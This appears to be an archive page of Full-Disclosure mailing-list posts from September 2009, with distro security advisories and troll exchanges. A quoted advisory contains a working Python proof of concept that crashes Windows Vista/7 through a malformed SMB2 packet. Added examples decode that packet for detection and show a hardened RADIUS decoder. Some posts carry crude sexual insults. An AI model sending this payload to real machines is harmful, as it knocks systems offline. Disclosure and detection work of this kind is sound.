Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-10 Thread D-vice
Teh Lulz are gone, stop feeding the fucking trolls

On Wed, Sep 9, 2009 at 9:42 PM,  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hey, buddy, you know spam filters sometimes can be stupid.
> Don't implement a stupid filter in your head.
> Just because I mention a troll in my email, have a hushmail
> address, and post a link you assume I must be rickrolling you or
> something?
>
> I was really surprised when I heard that Gaffie's remote DoS could
> in fact be remote code exec. Not a mention here, unless I missed
> something.
>
> That's the link I posted, and since I don't understand shit to asm,
> I was expecting some feedback.
>
> BTW, this is not a flame, but since you assumed I was trolling, I
> just wanted to make clear I was providing info, and waiting for
> feedback on it.
>
>
>
> PS : I use hush as disposable addresses, and it's none of your
> business. And I don't mind my sister sleeping around, she's just a
> whore anyway.
>
> - --
> Does anybody care?
>
> In fact does anybody who contributes anything useful to this list
> use
> Hushmail? (at this time I am too lazy to look). If not I can set my
> spam
> filter. Amusing as it has been, it has grown tiresome.
>
> btw mr lawyer/mr random guy etc. my dick is bigger than yours, at
> least
> that's what your wife  and sister tell me ;-)
>
> I am a noob with skills marginally better (debatable) than the
> average
> spotty first line support analyst. Therefore constructive criticism
> is
> welcomed, anything else is ignored unless I am bored or stupid
> enough to
> read/respond to these postings after a bottle of Shiraz.
>
> regards
> the learner aka
> MrX
>
> ps I wish I didn't have so much to learn.
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0
> wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/
> u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6
> qBRkqZE=
> =ymH2
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-10 Thread D-vice
n3td3v works for micro$ucks, go figure

On Thu, Sep 10, 2009 at 6:56 AM, James Matthews  wrote:

> So Msoft! why can't they just stop reintroducing bugs?
>
>
> On Wed, Sep 9, 2009 at 11:04 AM,  wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> How come all I hear about is n3td3v, and I see no one crying out
>> loud about this :
>> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
>> sk=show&action=view&id=64&Itemid=15
>>
>> is fd all 'bout trolls nao?
>>
>> - --
>> =
>> - - Release date: September 7th, 2009
>> - - Discovered by: Laurent Gaffié
>> - - Severity: Medium/High
>> =
>>
>> I. VULNERABILITY
>> - -
>> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> - -
>> Windows Vista and newer Windows versions come with a new SMB version
>> named SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
>> erver_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> - -
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends
>> to an SMB server, and it's used
>> to identify the SMB dialect that will be used for further
>> communication.
>>
>> IV. PROOF OF CONCEPT
>> - -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> # When SMB2.0 receives a "&" char (0x26) in the "Process Id High" SMB
>> # header field it dies with a
>> # PAGE_FAULT_IN_NONPAGED_AREA
>>
>> from socket import socket
>>
>> host = "IP_ADDR", 445  # target and TCP port 445 (direct-hosted SMB)
>> buff = (
>> b"\x00\x00\x00\x90" # NetBIOS session message, 0x90 = 144 bytes follow
>> b"\xff\x53\x4d\x42" # Server Component: SMB
>> b"\x72\x00\x00\x00" # Command 0x72 = Negotiate Protocol; NT Status (first 3 bytes)
>> b"\x00\x18\x53\xc8" # NT Status (last byte); Flags 0x18; Flags2 0xc853
>> b"\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
>> b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" # Signature, Reserved, TID 0xffff, PID 0xfeff
>> b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" # UID, MID, WordCount 0, ByteCount 0x6d, dialects follow
>> b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" # "PC NETWORK PROGRAM 1.0"
>> b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" # "LANMAN1.0"
>> b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" # "Windows for Workgroups 3.1a"
>> b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" # "LM1.2X002", "LANMAN2.1"
>> b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" # "NT LM 0.12"
>> b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" # "SMB 2.002"
>> b"\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> - -
>> An attacker can remotely crash, without any user interaction, any
>> Vista/Windows 7 machine with SMB enabled.
>> Windows XP and 2000 are NOT affected as they don't have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> - -
>> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
>> Win Server 2008
>> as it uses the same SMB2.0 driver (not tested).
>>
>> VII. SOLUTION
>> - -
>> Vendor contacted, but no patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>>
>> VIII. REFERENCES
>> - -
>> http://microsoft.com
>>
>> IX. CREDITS
>> - -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>> http://g-laurent.blogspot.com/
>>
>> X. LEGAL NOTICES
>> - -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
>> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
>> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
>> 6kWcu5Q=
>> =MjSD
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> --
> http://www.jewelerslounge.com
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
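
As an added example that is not part of Laurent Gaffié's advisory or of anyone's post in this thread: a decoder for the request above. It unpacks the 32-byte SMB1 header that the PoC comments label (command, flags, Process ID High, TID/PID/UID/MID), walks the NEGOTIATE dialect list, and flags a NEGOTIATE whose PidHigh is not zero, which is the one thing the PoC changes from a normal client request. POC_NEGOTIATE is the advisory's byte string copied from the PoC; CLEAN_NEGOTIATE is a constructed copy with PidHigh reset to zero. Field names follow MS-CIFS; the function names are this example's own.

```python
import struct

SMB_COM_NEGOTIATE = 0x72

# SMB1 header (MS-CIFS 2.2.3.1), 32 bytes, little-endian:
# Protocol(4s) Command(B) Status(I) Flags(B) Flags2(H) PIDHigh(H)
# SecurityFeatures(8s) Reserved(H) TID(H) PIDLow(H) UID(H) MID(H)
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")

# The advisory's PoC bytes (NetBIOS session header + SMB NEGOTIATE).
POC_NEGOTIATE = (
    b"\x00\x00\x00\x90"
    b"\xff\x53\x4d\x42"
    b"\x72\x00\x00\x00"
    b"\x00\x18\x53\xc8"
    b"\x00\x26"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)
# Constructed control: same request with PidHigh (SMB offset 12, packet
# offset 16) set back to the normal value 0x0000.
CLEAN_NEGOTIATE = POC_NEGOTIATE[:16] + b"\x00\x00" + POC_NEGOTIATE[18:]


def parse_negotiate(packet):
    """Decode a NetBIOS-framed SMB1 request into its header fields and, for a
    NEGOTIATE, its dialect list. Raises ValueError on any framing problem."""
    if len(packet) < 4:
        raise ValueError("no NetBIOS session header")
    nb_type, nb_len = packet[0], int.from_bytes(packet[1:4], "big")
    smb = packet[4:4 + nb_len]
    if nb_type != 0x00 or len(smb) != nb_len:
        raise ValueError("NetBIOS length %d does not match payload" % nb_len)
    if len(smb) < 32 + 3:
        raise ValueError("too short for header + WordCount + ByteCount")
    (proto, command, status, flags, flags2, pid_high, _sig, _reserved,
     tid, pid_low, uid, mid) = SMB_HEADER.unpack(smb[:32])
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 header")
    word_count = smb[32]
    params_end = 33 + 2 * word_count
    if params_end + 2 > len(smb):
        raise ValueError("WordCount overruns message")
    byte_count = struct.unpack_from("<H", smb, params_end)[0]
    data = smb[params_end + 2:params_end + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount overruns message")
    dialects = []
    if command == SMB_COM_NEGOTIATE:
        off = 0
        while off < len(data):
            if data[off] != 0x02:            # BufferFormat byte of each entry
                raise ValueError("dialect entry without 0x02 BufferFormat")
            end = data.index(b"\x00", off + 1)   # ValueError if unterminated
            dialects.append(data[off + 1:end].decode("ascii"))
            off = end + 1
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "pid_high": pid_high, "tid": tid,
            "pid_low": pid_low, "uid": uid, "mid": mid, "dialects": dialects}


def negotiate_findings(packet):
    """Reasons this NEGOTIATE looks like the crash trigger; [] means clean.
    Real clients leave PidHigh at zero, so any other value is worth an alert."""
    info = parse_negotiate(packet)
    findings = []
    if info["command"] == SMB_COM_NEGOTIATE and info["pid_high"] != 0:
        findings.append("PidHigh=0x%04x in NEGOTIATE (clients send 0)"
                        % info["pid_high"])
    return findings


if __name__ == "__main__":
    for name, pkt in ("PoC", POC_NEGOTIATE), ("clean", CLEAN_NEGOTIATE):
        print(name, parse_negotiate(pkt)["dialects"][-1], negotiate_findings(pkt))
```

The decoder shows two things the PoC only implies: the "&" lands in the high byte of PidHigh (0x2600 when read little-endian), and the dialect list ends with "SMB 2.002", which is what lets a Vista/7 server answer in SMB2 and so puts the request in front of SRV2.SYS in the first place. The same check can be run over the first client message of every port-445 stream in a capture.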

[Full-disclosure] [SECURITY] [DSA 1883-1] New nagios2 packages fix several cross-site scriptings

2009-09-10 Thread Steffen Joeris
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1883-1  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
September 10, 2009http://www.debian.org/security/faq
- 

Package: nagios2
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE Ids: CVE-2007-5624 CVE-2007-5803 CVE-2008-1360
Debian Bugs: 448371 482445 485439

Several vulnerabilities have been found in nagios2, a host/service/network
monitoring and management system. The Common Vulnerabilities and
Exposures project identifies the following problems:


Several cross-site scripting issues via several parameters were
discovered in the CGI scripts, allowing attackers to inject arbitrary
HTML code. In order to cover the different attack vectors, these issues
have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360.


For the oldstable distribution (etch), these problems have been fixed in
version 2.6-2+etch4.

The stable distribution (lenny) does not include nagios2 and nagios3 is
not affected by these problems.

The testing distribution (squeeze) and the unstable distribution (sid)
do not contain nagios2 and nagios3 is not affected by these problems.


We recommend that you upgrade your nagios2 packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4.diff.gz
Size/MD5 checksum:35589 5aee898df4f6ea4a0fa4a1fb22390a0b
  http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6.orig.tar.gz
Size/MD5 checksum:  1734400 a032edba07bf389b803ce817e9406c02
  http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4.dsc
Size/MD5 checksum:  948 a4bd33d2bd5c812b5c9899fc41651e37

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-doc_2.6-2+etch4_all.deb
Size/MD5 checksum:  1149816 8b2d0a07cd650edc3e6d33f74b480cb2
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-common_2.6-2+etch4_all.deb
Size/MD5 checksum:59416 f70cd9aa86a0eb1b64a914b40da984cd

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_alpha.deb
Size/MD5 checksum:  1222136 4dc7d3e1230632930471fb0e0dcbd496
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_alpha.deb
Size/MD5 checksum:  1702766 6ff7f9e7bb6cdaa0cea2fb0dfe35ae72

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_amd64.deb
Size/MD5 checksum:  1687984 4c28fa0a9fa9883cdff1e038c56924e0
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_amd64.deb
Size/MD5 checksum:  1097788 31afdb67e26e5f1a56a9da7a1452

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_arm.deb
Size/MD5 checksum:  1537452 4e4d636a0699cf9f714a522885894a4e
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_arm.deb
Size/MD5 checksum:  1023982 fb3a8f2b2b592bafcf1830172a7d5a8e

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_hppa.deb
Size/MD5 checksum:  1148976 c875e0ab58ca0f39bf34b1704cc4a969
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_hppa.deb
Size/MD5 checksum:  1622072 e002a9c7703542bd8aa8e509238ba29c

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_i386.deb
Size/MD5 checksum:  1587836 778bd65bfb6cfb1f3f0efcb872a32360
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_i386.deb
Size/MD5 checksum:  1016950 720d00ef27782b51c0b7e675c2f82309

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_ia64.deb
Size/MD5 checksum:  1623324 1a157461c15e81c93670ad92c3792b69
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_ia64.deb
Size/MD5 checksum:  1711252

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOLREQUEST Remote B.S.O.D.

2009-09-10 Thread mutiny
Nearly a year before release, of the new version (of the same thing).

*sigh*
  - Original Message - 
  From: James Matthews 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Thursday, September 10, 2009 12:56 AM
  Subject: Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE 
PROTOCOLREQUEST Remote B.S.O.D.


  So Msoft! why can't they just stop reintroducing bugs?



[Full-disclosure] [ MDVSA-2009:226 ] freeradius

2009-09-10 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:226
 http://www.mandriva.com/security/
 ___

 Package : freeradius
 Date: September 10, 2009
 Affected: Corporate 4.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in freeradius:
 
 The rad_decode function in FreeRADIUS before 1.1.8 allows remote
 attackers to cause a denial of service (radiusd crash) via zero-length
 Tunnel-Password attributes.  NOTE: this is a regression error related
 to CVE-2003-0967 (CVE-2009-3111).
 
 This update provides a solution to this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111
 ___

 Updated Packages:

 Corporate 4.0:
 37f0dc23fdd28466d7a94db9ad445e36  
corporate/4.0/i586/freeradius-1.0.4-2.5.20060mlcs4.i586.rpm
 e9f0aeb620f6c18f7abe8cd030ee5b45  
corporate/4.0/i586/libfreeradius1-1.0.4-2.5.20060mlcs4.i586.rpm
 5efc89f68a9ae3323f4d08db2db99c76  
corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.5.20060mlcs4.i586.rpm
 7cfebad483805297740a24c630d959c4  
corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.5.20060mlcs4.i586.rpm
 e9cfff1376db58a3dec1499bdada7d07  
corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.5.20060mlcs4.i586.rpm
 97d0dd301a51c5402d4fdedd113a4162  
corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.5.20060mlcs4.i586.rpm
 617dbf6ea9191afb7f9573e65883  
corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.5.20060mlcs4.i586.rpm
 3a75efd86b69a5bb0ac240d1e7c2ae75  
corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.5.20060mlcs4.i586.rpm 
 a89677d75dc960fd619954eb53b4d749  
corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 b4ac8ca1b8e9bca59c7f1a2b21386e65  
corporate/4.0/x86_64/freeradius-1.0.4-2.5.20060mlcs4.x86_64.rpm
 018ee9ffa0b73a5f5cf2b183f83deb5d  
corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.5.20060mlcs4.x86_64.rpm
 24f796932b9ffe79093351912a1c40e7  
corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.5.20060mlcs4.x86_64.rpm
 adc0cba3f5d762c43c494aed2c2e4924  
corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.5.20060mlcs4.x86_64.rpm
 c21d434b39fca57615932c5e4c895459  
corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.5.20060mlcs4.x86_64.rpm
 b52370d5e13cb0e9534050e5f7e8a5a7  
corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.5.20060mlcs4.x86_64.rpm
 8bdcfbb1740d3967b5ef909f14af32c9  
corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.5.20060mlcs4.x86_64.rpm
 d376a3b411ecd4ed71c2289b2da536ae  
corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.5.20060mlcs4.x86_64.rpm 
 a89677d75dc960fd619954eb53b4d749  
corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKqMYdmqjQ0CJFipgRAmWZAKDiWc30oc8TUdCK9qT5+svPaMOPzQCgm73G
dGxi5xjHNGGtXkz/9cowb9A=
=0yka
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
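
The advisory's one-line description (rad_decode crashes on a zero-length Tunnel-Password) is enough to show the bug class. As an added example that is not FreeRADIUS code: a small RADIUS attribute decoder in Python that builds and decrypts Tunnel-Password per RFC 2868 section 3.5, and rejects an empty value with an error instead of indexing into it. The shared secret, Request Authenticator, Salt, user name and password are constructed sample inputs; the function names are this example's own.

```python
import hashlib
import struct

RADIUS_HEADER = struct.Struct("!BBH16s")   # Code, Identifier, Length, Authenticator
ATTR_USER_NAME = 1
ATTR_TUNNEL_PASSWORD = 69                  # RFC 2868 section 3.5


class RadiusDecodeError(ValueError):
    """Malformed packet or attribute: the caller should drop the packet."""


def parse_attributes(body):
    """Split the attribute region into (type, value) pairs. An AVP is
    Type(1) Length(1) Value; Length counts its own two octets, so a
    zero-length value arrives as Length == 2. That is valid framing, so it
    is passed through and left to the per-attribute decoder to judge."""
    attrs, off = [], 0
    while off < len(body):
        if len(body) - off < 2:
            raise RadiusDecodeError("truncated attribute header at %d" % off)
        atype, alen = body[off], body[off + 1]
        if alen < 2 or off + alen > len(body):
            raise RadiusDecodeError("bad Length %d for attribute %d" % (alen, atype))
        attrs.append((atype, body[off + 2:off + alen]))
        off += alen
    return attrs


def encrypt_tunnel_password(secret, authenticator, password, tag, salt):
    """Tunnel-Password value: Tag(1) Salt(2) String. P = data-length || password
    zero-padded to 16 octets; c(i) = p(i) XOR b(i), b(1) = MD5(S||R||A),
    b(i) = MD5(S||c(i-1))."""
    plain = bytes([len(password)]) + password
    plain += b"\x00" * (-len(plain) % 16)
    out, prev = b"", authenticator + salt
    for i in range(0, len(plain), 16):
        b = hashlib.md5(secret + prev).digest()
        c = bytes(x ^ y for x, y in zip(plain[i:i + 16], b))
        out, prev = out + c, c
    return bytes([tag]) + salt + out


def decode_tunnel_password_unchecked(value):
    """Shape of the pre-1.1.8 bug: read Tag and Salt before checking they exist.
    On an empty value this is an out-of-bounds read (IndexError here; in C,
    the radiusd crash the advisory describes)."""
    return value[0], value[1:3], value[3:]


def decode_tunnel_password(secret, authenticator, value):
    """Hardened decoder: validate the envelope before indexing anything."""
    if len(value) < 3 + 16:
        raise RadiusDecodeError("Tunnel-Password value too short (%d octets)" % len(value))
    tag, salt, cipher = value[0], value[1:3], value[3:]
    if len(cipher) % 16:
        raise RadiusDecodeError("Tunnel-Password String not a multiple of 16 octets")
    if not salt[0] & 0x80:
        raise RadiusDecodeError("Tunnel-Password Salt must have its high bit set")
    plain, prev = b"", authenticator + salt
    for i in range(0, len(cipher), 16):
        b = hashlib.md5(secret + prev).digest()
        c = cipher[i:i + 16]
        plain, prev = plain + bytes(x ^ y for x, y in zip(c, b)), c
    data_len = plain[0]
    if data_len > len(plain) - 1:
        raise RadiusDecodeError("Tunnel-Password data-length exceeds String")
    return tag, plain[1:1 + data_len]


def build_packet(code, ident, authenticator, attrs):
    body = b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)
    return RADIUS_HEADER.pack(code, ident, 20 + len(body), authenticator) + body


def decode_packet(secret, packet):
    """Decode into [(type, value)] with Tunnel-Password decrypted. Every
    malformation surfaces as RadiusDecodeError, never as a crash."""
    if len(packet) < 20:
        raise RadiusDecodeError("packet shorter than the 20-octet header")
    code, ident, length, authenticator = RADIUS_HEADER.unpack(packet[:20])
    if not 20 <= length <= len(packet):
        raise RadiusDecodeError("Length %d inconsistent with %d octets" % (length, len(packet)))
    out = []
    for atype, value in parse_attributes(packet[20:length]):
        if atype == ATTR_TUNNEL_PASSWORD:
            value = decode_tunnel_password(secret, authenticator, value)
        out.append((atype, value))
    return out


# Constructed sample inputs (not from the advisory); fixed so the run repeats.
SECRET = b"s3cr3t"
AUTHENTICATOR = bytes(range(16))
GOOD_PACKET = build_packet(2, 1, AUTHENTICATOR, [
    (ATTR_USER_NAME, b"bob"),
    (ATTR_TUNNEL_PASSWORD, encrypt_tunnel_password(
        SECRET, AUTHENTICATOR, b"hunter2", tag=1, salt=b"\x9a\x5b")),
])
# The trigger from the advisory: Tunnel-Password with Length == 2 (empty value).
ZERO_LENGTH_PACKET = build_packet(2, 2, AUTHENTICATOR, [(ATTR_TUNNEL_PASSWORD, b"")])

if __name__ == "__main__":
    print(decode_packet(SECRET, GOOD_PACKET))
    try:
        decode_packet(SECRET, ZERO_LENGTH_PACKET)
    except RadiusDecodeError as e:
        print("rejected:", e)
```

The point is where the length check lives: the generic AVP walker correctly accepts Length == 2, so the attribute-specific decoder has to enforce its own minimum (Tag + Salt + one 16-octet block) before it touches a byte. The 1.1.8 regression note in the advisory is the same lesson as CVE-2003-0967: a check that lives in one code path gets lost when the other path is rewritten.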


Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-10 Thread Mitch Oliver
 > I. VULNERABILITY
 > - -
 > Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

This does not appear to apply to the version of Windows 7 released to 
manufacture.  It does, however, 
apply to all beta versions and Windows 2008.

Mitch Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-10 Thread kalyan
Dear all

Is it a good mail? What do you feel, guys? It doesn't encrypt your
passwords:

POST /cgi-bin/login.cgi HTTP/1.1
Host: mail.rediff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.rediff.com/
Cookie: RuW=1252586041360329; RsW=IND; RLOC=%5F%5FeZMqPfDceMg%5F%5F4P6Xdf5DkD2%5F%5FtHonjGX8AnI%5F%5Find%5F%5F; Rt=%3D%3DAMwAjN3czN; accounttype=77; Rp=g%3D2%26a%3D24%26c%3D08%26s%3D29%26cn%3D099%26z%3D123456%26p%3D034%26e%3D05%26d%3D_04%26i%3D_35_%26dor%3D20060220%26mi%3D3; RMID=7c7dc92f4aa8f200; RMFS=011MljEWU107fl; app_lang=; ckey=70795
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

login=evil.devil&passwd=devil.evil&remember=1&FormName=existing


Regards
Kalyan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-821-1] Firefox and Xulrunner vulnerabilities

2009-09-10 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-821-1 September 10, 2009
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2009-3070, CVE-2009-3071, CVE-2009-3072, CVE-2009-3074,
CVE-2009-3075, CVE-2009-3076, CVE-2009-3077, CVE-2009-3078,
CVE-2009-3079
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser3.0.14+build2+nobinonly-0ubuntu0.8.10.1
